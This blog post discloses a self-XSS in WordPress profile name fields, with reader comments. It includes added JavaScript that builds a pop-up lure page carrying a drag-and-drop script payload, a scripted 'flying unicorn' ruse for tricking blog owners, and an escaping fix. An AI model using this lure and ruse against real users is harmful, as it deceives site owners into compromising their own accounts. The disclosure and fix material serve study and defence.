0day XSS in WordPress core

I found a self-XSS in the WordPress core the other day. Once you manage to successfully exploit this vulnerability, only your imagination limits what you can do with the WordPress installation.

A self-XSS requires more user interaction than the classic click-bam-boom effect of an ordinary XSS.

The classic way of triggering the "bam" (the actual exploitation of a self-XSS) is to carefully position and crop an iframe based on the victim's browser resolution, style the iframe with CSS so that it looks like part of your page, and then convince the victim to drag something into that cropped iframe.

The "boom" follows automatically once the "bam" has succeeded: the chosen payload executes. In our case that is an innocent JavaScript alert box, but it could just as well be requests that change the user's password, add accounts, install malicious plugins, or steal cookies.

The draggable element carries the payload: the code, the JavaScript you would like to execute.
Here is, for example, a draggable image which carries the not-too-malicious payload "<script>alert(123);</script>".

')" src='http://h.ackack.net/img/Hacker_Emblem.jpg'>

The major problem with this XSS is that we can't load the blog's administration page in an iframe, so we would have to open a pop-up to the administration page of the victim's own blog and convince the victim to drag and drop the image, div, or whatever else you came up with into a field on that page.
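The `<img>` tag shown earlier survives in this copy of the post only as the tail of its `ondragstart` attribute, so here is a complete, added reconstruction of the lure page for the pop-up variant. This is example code, not the post's own: the victim blog URL is an assumption, the image URL and the alert payload are taken from the post, and the page uses the HTML5 drag-and-drop API (`dataTransfer.setData('text/plain', ...)`), which is what an `<input>` accepts on drop. One detail the original tag glosses over is that the payload contains `</script>`, which would terminate the inline script block that carries it unless the `</` is escaped.

```javascript
// Added example, not code from the original post. Builds the attacker's lure page:
// a pop-up to the victim's own profile page plus a draggable image whose drag data
// is the XSS payload. The victim blog URL is assumed; the image and payload come
// from the post.
const VICTIM_PROFILE_URL = 'http://victim-blog.example/wp-admin/profile.php'; // assumed
const LURE_IMAGE = 'http://h.ackack.net/img/Hacker_Emblem.jpg';
const PAYLOAD = '<script>alert(123);</script>';

// Turn a string into a JavaScript string literal that can be embedded inside an
// inline <script> block. JSON.stringify handles quotes, backslashes and control
// characters, but the HTML parser would still end the script block at a literal
// "</script>" inside the string, so "</" is additionally written as "<\/" (a
// valid escape in both JS string literals and JSON).
function jsLiteralForInlineScript(str) {
  return JSON.stringify(str).replace(/<\//g, '<\\/');
}

// The lure page. window.open() loads the victim's profile page in a pop-up; the
// victim is already logged in there, so their own browser supplies the session.
// On dragstart the image's drag data is set to the payload; dropping the image
// into the "First name" <input> inserts that text/plain data as the field value,
// exactly as if the victim had typed it.
function buildLurePage(profileUrl, payload, imageUrl) {
  const safeImageUrl = imageUrl.replace(/"/g, '&quot;');
  return `<!DOCTYPE html>
<html>
<body>
<p>Drag the emblem onto the "First name" field in the window that just opened,
then click "Update Profile" to see the unicorns!</p>
<img id="lure" draggable="true" src="${safeImageUrl}" alt="">
<script>
window.open(${jsLiteralForInlineScript(profileUrl)}, 'wp', 'width=1000,height=700');
document.getElementById('lure').addEventListener('dragstart', function (e) {
  e.dataTransfer.setData('text/plain', ${jsLiteralForInlineScript(payload)});
});
</script>
</body>
</html>
`;
}

// Check that the inline script survives the HTML parser: the page must contain
// exactly one closing </script> tag, the real one, not a second one smuggled in
// by the payload.
function closingScriptTagCount(html) {
  return (html.match(/<\/script>/gi) || []).length;
}
```

Serve the string returned by `buildLurePage(VICTIM_PROFILE_URL, PAYLOAD, LURE_IMAGE)` from the attacker's site; everything after the drop is the victim's own browser submitting their own profile form.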

A possible scenario plays on the fact that people like cool tricks, easter eggs and unicorns, and that many WordPress blog owners are not very IT-literate.
You tell them that by dragging an element into one of the fields I am about to describe, they get a flying unicorn on their screen. You never know how far people will go; compare the "make the Google logo dance" trick, which is not malicious in itself and is passed around by users all over the world.

For those who don't know it, here is that "cool" trick exactly as it gets shared:

Step 1: Go to www.google.com. It must be google.com, not google.ro, google.tu or any other Google domain.
Step 2: Delete the URL in the address bar: select the address, right-click the selection and delete it.
Step 3: Copy and paste this code into the address bar:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
Step 4: Hit enter.
Step 5: Watch Google dance like mad.
Step 6: This can be applied to any website.
Step 7: Get over the pain, because you just got slapped in the face by me for your stupidity.

That proves that my "easter egg" idea might work pretty well: people will paste or drag whatever they are told to.

The vulnerability itself exists in the following places in WordPress:

http://h.ackack.net/wp-admin/user-edit.php?user_id=

http://h.ackack.net/wp-admin/profile.php

By putting JavaScript inside the "first_name", "last_name" or "nickname" input elements and saving the profile, the self-XSS triggers 3 times.

If you drag the image shown earlier into one of these elements the XSS triggers, and simply typing "<script>alert(123);</script>" into one of them has the same effect.
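To make concrete why a name saved once can fire three times, here is an added illustration (not WordPress's code) of a toy profile-page renderer that concatenates the stored first name straight into the markup at three assumed text locations, beside the escaped version that fixes it. The locations and the sample database row are constructed for the example; the post only reports that the payload triggers three times.

```javascript
// Added illustration, not WordPress code: a toy renderer for the profile page.
// The user row is a constructed sample, with the post's payload saved as first_name.
const userFromDb = { first_name: '<script>alert(123);</script>' };

// Escape the five characters that have meaning in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;',
  })[c]);
}

// Vulnerable: the stored value is concatenated into the markup as-is. It lands in
// three text contexts (assumed locations: admin-bar greeting, page heading,
// sidebar), so one saved payload runs three times on every page view. It is also
// echoed into the form field's value attribute; "<script>" does not execute
// inside an attribute value, but a payload that closes the quote would.
function renderProfileVulnerable(user) {
  return [
    `<div id="wpadminbar">Howdy, ${user.first_name}</div>`,
    `<h2>Profile: ${user.first_name}</h2>`,
    `<span class="sidebar-name">${user.first_name}</span>`,
    `<input type="text" name="first_name" value="${user.first_name}">`,
  ].join('\n');
}

// Fixed: every place the stored value is written into HTML goes through
// escapeHtml(), so the browser renders the payload as literal text and the
// attribute value can no longer be closed early. The stored data is untouched;
// escaping happens on output, in the context the value is written into.
function renderProfileSafe(user) {
  const name = escapeHtml(user.first_name);
  return [
    `<div id="wpadminbar">Howdy, ${name}</div>`,
    `<h2>Profile: ${name}</h2>`,
    `<span class="sidebar-name">${name}</span>`,
    `<input type="text" name="first_name" value="${name}">`,
  ].join('\n');
}

// Crude check used by the test: count <script start tags that sit in text
// context. Quoted attribute values are blanked first because a <script> tag
// inside a value="..." is inert. (A regex is enough for this toy markup; real
// pages need an HTML parser.)
function countScriptTagsInText(html) {
  const withoutAttrValues = html.replace(/="[^"]*"/g, '=""');
  return (withoutAttrValues.match(/<script\b/gi) || []).length;
}
```

WordPress ships `esc_html()` and `esc_attr()` for exactly these two output contexts; the fix for a stored XSS like this one is to route every echo of user-controlled profile data through them, not to filter what the user is allowed to type.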

As you can imagine, this gives us a generic way of social-engineering people into getting their own blog pwned.

Step 1: Go to http://<your website>/wp-admin/profile.php and log in if the page asks for it.
Step 2: Put this code inside your "First name" field and save your profile:

<script>alert(123);</script>

Step 3: See unicorns flying over your screen!

Here is an image of the XSS in action:

This vulnerability exists in the latest version at the time of writing and reaches back to some unknown earlier version.

Hello, I am Jelmer, born in 1991, and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email at jelmerdehen [ at ] hotmail [d0t] com, or you can chat with me on IRC.

8 Comments

  1. knull says:

    I don't see this becoming much of an issue for WordPress users in general, except for the most stupid of WP admins of course. Flying unicorns FTW!

  2. WordPress User Data Minor Self-XSS | Pressecure says:

    [...] de Hen has posted an unpatched minor vulnerability in the WordPress core, version 3.1.3 and possibly earlier versions. It allows for cross-site [...]

  3. WordPress: Security Patch for XSS Vulnerability | Eizil.com says:

    [...] this was written after finishing trying out the security patch to prevent the XSS vulnerability that bro @AffanRuslan shared with me on Twitter late this afternoon. Because [...]

  4. at says:

    That doesn't quite seem to work...

  5. RandyProton says:

    Cool move bro ;) I'm still learning about security, but I found your post very interesting, even though I can't run the script on Firefox 4.0.1; haven't tested in other browsers.

    @ethicalhack3r Ryan Dewhurst brought me here :)

  6. Root says:

    Can we be friends?

  7. Web Hacking 2011 (Blog Attacks) | Villacorp says:

    [...] XSS in wordpress core http://h.ackack.net/0day-xss-in-wordpress-core.html "Cross Site Scripting" vulnerability. As I demonstrated in the Master Hacking course, this type of [...]
